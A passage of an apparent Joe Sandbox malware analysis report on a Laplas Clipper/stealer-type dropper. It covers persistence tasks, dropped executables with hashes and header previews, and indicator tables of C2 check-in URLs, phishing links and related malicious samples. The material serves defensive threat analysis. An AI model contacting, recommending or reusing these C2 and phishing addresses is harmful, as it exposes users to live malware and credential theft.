                                                                                                  13:13:13API Interceptor158x Sleep call for process: powershell.exe modified
                                                                                                  13:13:22API Interceptor1x Sleep call for process: LicCheck.exe modified
                                                                                                  13:13:55API Interceptor456x Sleep call for process: svcupdater.exe modified
                                                                                                  13:14:36API Interceptor38135x Sleep call for process: lsass.exe modified
                                                                                                  13:14:36API Interceptor933x Sleep call for process: dllhost.exe modified
                                                                                                  13:14:36API Interceptor57756x Sleep call for process: winlogon.exe modified
                                                                                                  13:14:37API Interceptor5236x Sleep call for process: svchost.exe modified
                                                                                                  13:14:40API Interceptor28810x Sleep call for process: dwm.exe modified
                                                                                                  18:13:41Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
                                                                                                  18:13:51Task SchedulerRun new task: svcupdater path: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  45.159.189.105Mega.nz Spreader.exeGet hashmaliciousLaplas Clipper, Meduza StealerBrowse
                                                                                                  • 45.159.189.105/bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d
                                                                                                  9RDOrudEBB.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=computer\user
                                                                                                  file.exeGet hashmaliciousLaplas Clipper, RedLineBrowse
                                                                                                  • 45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
                                                                                                  SXm1px9Zg0.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=computer\user
                                                                                                  4x8vn385io.exeGet hashmaliciousMinerDownloader, Laplas Clipper, RedLine, XmrigBrowse
                                                                                                  • 45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
                                                                                                  iJ6SIwcNf3.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=computer\user
                                                                                                  YRcS5GIB02.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
                                                                                                  F2u0un5xar.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=computer\user
                                                                                                  rGn7jtGZE0.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?guid=992547&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
                                                                                                  1DtMIGzTkc.exeGet hashmaliciousLaplas ClipperBrowse
                                                                                                  • 45.159.189.105/bot/online?guid=980108&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
                                                                                                  185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                  • jasonj002.bitbucket.io/

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  bitbucket.orgfile.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.48
                                                                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                  • 185.166.143.50
                                                                                                  sostener.vbsGet hashmaliciousXWormBrowse
                                                                                                  • 185.166.143.50
                                                                                                  0XVZC3kfwL.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49
                                                                                                  nTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 185.166.143.49
                                                                                                  envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.48
                                                                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                  • 185.166.143.50
                                                                                                  S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                                                                  • 185.166.143.50
                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                                  • 185.166.143.48

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  HOSTING-SOLUTIONSUStest_loading.exeGet hashmaliciousMeterpreterBrowse
                                                                                                  • 162.248.224.223
                                                                                                  3plugin29563.exeGet hashmaliciousAmadeyBrowse
                                                                                                  • 185.209.162.226
                                                                                                  ExeFile (200).exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.130.105.44
                                                                                                  ExeFile (200).exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.130.105.44
                                                                                                  Mega.nz Spreader.exeGet hashmaliciousLaplas Clipper, Meduza StealerBrowse
                                                                                                  • 45.159.189.105
                                                                                                  file.exeGet hashmaliciousAmadeyBrowse
                                                                                                  • 185.209.162.226
                                                                                                  http://tqwwwcom.ru/Get hashmaliciousUnknownBrowse
                                                                                                  • 204.155.30.34
                                                                                                  xworm.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.209.160.70
                                                                                                  Fb9Ff8L4T7Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 185.209.160.99
                                                                                                  file.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                  • 185.209.162.208
                                                                                                  AMAZON-02UShttps://s3.amazonaws.com/r3e1272/Rco.html#4eyOul3510eTKK19nejdimaazo189TBUDIERNFIMTFBQ264510CRSG907S11Get hashmaliciousPhisherBrowse
                                                                                                  • 54.231.172.248
                                                                                                  http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzgGet hashmaliciousUnknownBrowse
                                                                                                  • 52.213.102.87
                                                                                                  https://www.fukui-tv.co.jp/_click.php?id=83642&url=https://brewingrecovery.com/carrierzone.html#acctg@azteccontainer.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 3.160.150.28
                                                                                                  https://rs-stripe.hometalk.com/branding/?utm_source=contentstripe&ampGet hashmaliciousUnknownBrowse
                                                                                                  • 3.134.193.124
                                                                                                  http://bloxsales.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 18.202.131.124
                                                                                                  https://lil-loveeeees.blogspot.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 54.76.113.237
                                                                                                  ethaertharety.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 13.33.187.32
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 52.217.166.121
                                                                                                  TsxJNxhxMJfQTd.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 52.222.214.77
                                                                                                  https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiN2NmYmYzYzYtZGJhZS00MDU2LWFmNjEtZTE1OTY4NGUxZTc4IiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyOTI1NTE2OCwibmJmIjoxNzI4MDQ1NTY4LCJpYXQiOjE3MjgwNDU1NjgsImp0aSI6IjdjZmJmM2M2LWRiYWUtNDA1Ni1hZjYxLWUxNTk2ODRlMWU3OCIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiIyNDYxNDE2ZC1iYWJmLTQzMDktOTRhYy1hZWJkYzRjMmZmY2MiLCJzaWduX3JlcXVlc3RfaWQiOiI3Y2ZiZjNjNi1kYmFlLTQwNTYtYWY2MS1lMTU5Njg0ZTFlNzgiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImZyYW5jZXMud29vZEB1a3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiZnJhbmNlcy53b29kQHVrcmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImZyYW5jZXMud29vZEB1a3JpLm9yZyJ9fQ.OqxYiO2DP6wYmX2t6u3X4Qa-FIZ5J__ELTV29qKimLo&eid=2461416d-babf-4309-94ac-aebdc4c2ffcc&esrt=7cfbf3c6-dbae-4056-af61-e159684e1e78Get hashmaliciousHTMLPhisherBrowse
                                                                                                  • 18.245.46.32

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                  • 185.166.143.49
                                                                                                  https://m0rrisvo.za.com/Qm4nK/Get hashmaliciousHTMLPhisherBrowse
                                                                                                  • 185.166.143.49
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49
                                                                                                  https://admin.hotcoinbase.com/Get hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49
                                                                                                  https://rb.gy/a8jf8cGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49
                                                                                                  Payout Receipt.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 185.166.143.49
                                                                                                  QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 185.166.143.49
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49
                                                                                                  rTCTdVVTSwCdqkFxlFIpU.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49
                                                                                                  WqZxLxZrOrnMWYaBaBKdLenVTu.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.49

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Program Files\Google\Chrome\updater.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicSend.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2330112
                                                                                                  Entropy (8bit):7.950671995498444
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:6obTXVXd5mAtLE64iNz971+2JAZ65NypM+++zTlu+rwThD:fbTltZa67z3+2JU6fyW7ck+gD
                                                                                                  MD5:4648D5EF582C7B17D9712F5B5B60F046
                                                                                                  SHA1:249BAC0094F6AEC1C4BB36F704DDCA1C708401A7
                                                                                                  SHA-256:0DBED06724205E7995F45B769454C3EBFD832F633471729EEBCE756CB90FC348
                                                                                                  SHA-512:04839048B38A1BCFF4254C77F479475C0B2E30E2D2BE5FAE65F23274107064A3D0ABB3CA8D1693A1809DB4DB9DFBE7A2681C169EBE536FEFB0CB01330D118F6F
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....s.c...............&......#................@..............................$.....L.$...`... ...............................................#.,.....#.......#...............#.............................@j#.(...................T.#..............................text...............................`..`.data... L"......N".................@....rdata.......`#......F#.............@..@.pdata........#......\#.............@..@.xdata........#......l#.............@..@.bss....8.....#..........................idata..,.....#......z#.............@....CRT....h.....#.......#.............@....tls..........#.......#.............@....rsrc.........#.......#.............@....reloc........#.......#.............@..B........................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GGLoader.exe.log

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\GGLoader.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):443
                                                                                                  Entropy (8bit):5.347274615985407
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
                                                                                                  MD5:F73EF0CF34F9748349B7DC26D23369A1
                                                                                                  SHA1:9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
                                                                                                  SHA-256:6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
                                                                                                  SHA-512:C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
                                                                                                  Malicious:true
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\LicCheck.exe

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):293888
                                                                                                  Entropy (8bit):6.586530975541652
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:W3UjDH1REzuiKXibpArGeNov4VFj5AOUecInYb:W3GbEmXibpn0y2E
                                                                                                  MD5:726A5B76F4C40551741FFDDA14088CE3
                                                                                                  SHA1:DF94D2F5475E8550B8D8F5DE6937F896BF0EA6B8
                                                                                                  SHA-256:69487840ADD22F155734E6E522E5E1437814CACCC14E137E0A9A602B790A4CB9
                                                                                                  SHA-512:477CE8E7B4DFDF288BCE73BF3F30CE8A94C53617903EB5B5B9B4BB61795E56ED4CD908100F88FAB76FF67FB7DF6C94280BE50576E672FCAC27589117E1C7CE06
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Q...Q...Q.....\...........G.......@.......G.............Z...Q...&.......T...../.P.......P...RichQ...........................PE..L...Ru.c...............".<...H.......S.......P....@.......................................@..................................E..x....p...........................%.. ...8...........................`...@............P...............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data........P.......@..............@....rsrc........p.......T..............@..@.reloc...%.......&...V..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\LicSend.exe

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2330112
                                                                                                  Entropy (8bit):7.950671995498444
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:6obTXVXd5mAtLE64iNz971+2JAZ65NypM+++zTlu+rwThD:fbTltZa67z3+2JU6fyW7ck+gD
                                                                                                  MD5:4648D5EF582C7B17D9712F5B5B60F046
                                                                                                  SHA1:249BAC0094F6AEC1C4BB36F704DDCA1C708401A7
                                                                                                  SHA-256:0DBED06724205E7995F45B769454C3EBFD832F633471729EEBCE756CB90FC348
                                                                                                  SHA-512:04839048B38A1BCFF4254C77F479475C0B2E30E2D2BE5FAE65F23274107064A3D0ABB3CA8D1693A1809DB4DB9DFBE7A2681C169EBE536FEFB0CB01330D118F6F
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....s.c...............&......#................@..............................$.....L.$...`... ...............................................#.,.....#.......#...............#.............................@j#.(...................T.#..............................text...............................`..`.data... L"......N".................@....rdata.......`#......F#.............@..@.pdata........#......\#.............@..@.xdata........#......l#.............@..@.bss....8.....#..........................idata..,.....#......z#.............@....CRT....h.....#.......#.............@....tls..........#.......#.............@....rsrc.........#.......#.............@....reloc........#.......#.............@..B........................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\LicenseGet.exe

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):182535
                                                                                                  Entropy (8bit):6.5599935407193355
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:UC1N4m020gm8xh060IdTzJuAldWNUIkPSQcKSxLPScCYbWqS9uN/dOU+0L:UC1N40Fnr0602TzhldWqIk6jKSxPMkPJ
                                                                                                  MD5:4F12E73FBABB2F0AA24437D5B6F7D6A6
                                                                                                  SHA1:F8E77330E5CEB9E3027FFEDF64B077A365AA616F
                                                                                                  SHA-256:0F8022CA77BAABC7F97BD7E50A14AF5F64717384026906D144BD47152AA0FFF6
                                                                                                  SHA-512:088D6E975021FFA3A8FC3A46CD55720EF7E2BF8B98B0A3E717F61574009D0642A2A50C332CF152B3AAC012497BA8D608FC582AEF6EB8EEC5EF9D62FA106E352A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I..DI..DI..D...DH..D...D]..D...D...D..DD..DI..D!..D...DH..DI..DH..DRichI..D........PE..L....R.c............................XF............@..........................@..............................................`................................ .. .......................................................t............................text...j........................... ..`.rdata...5.......@..................@..@.data....4.......0..................@....reloc.. .... ... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qrmq4xq.52l.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vfrq2rl.jvo.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aro4libn.snb.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkdcb1al.gdz.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gk5nnthk.ti2.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifcaqsed.1r1.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxjkuqj0.n0z.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzpj4l2d.dky.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdlivl2k.rog.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2cxuyvd.m3l.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
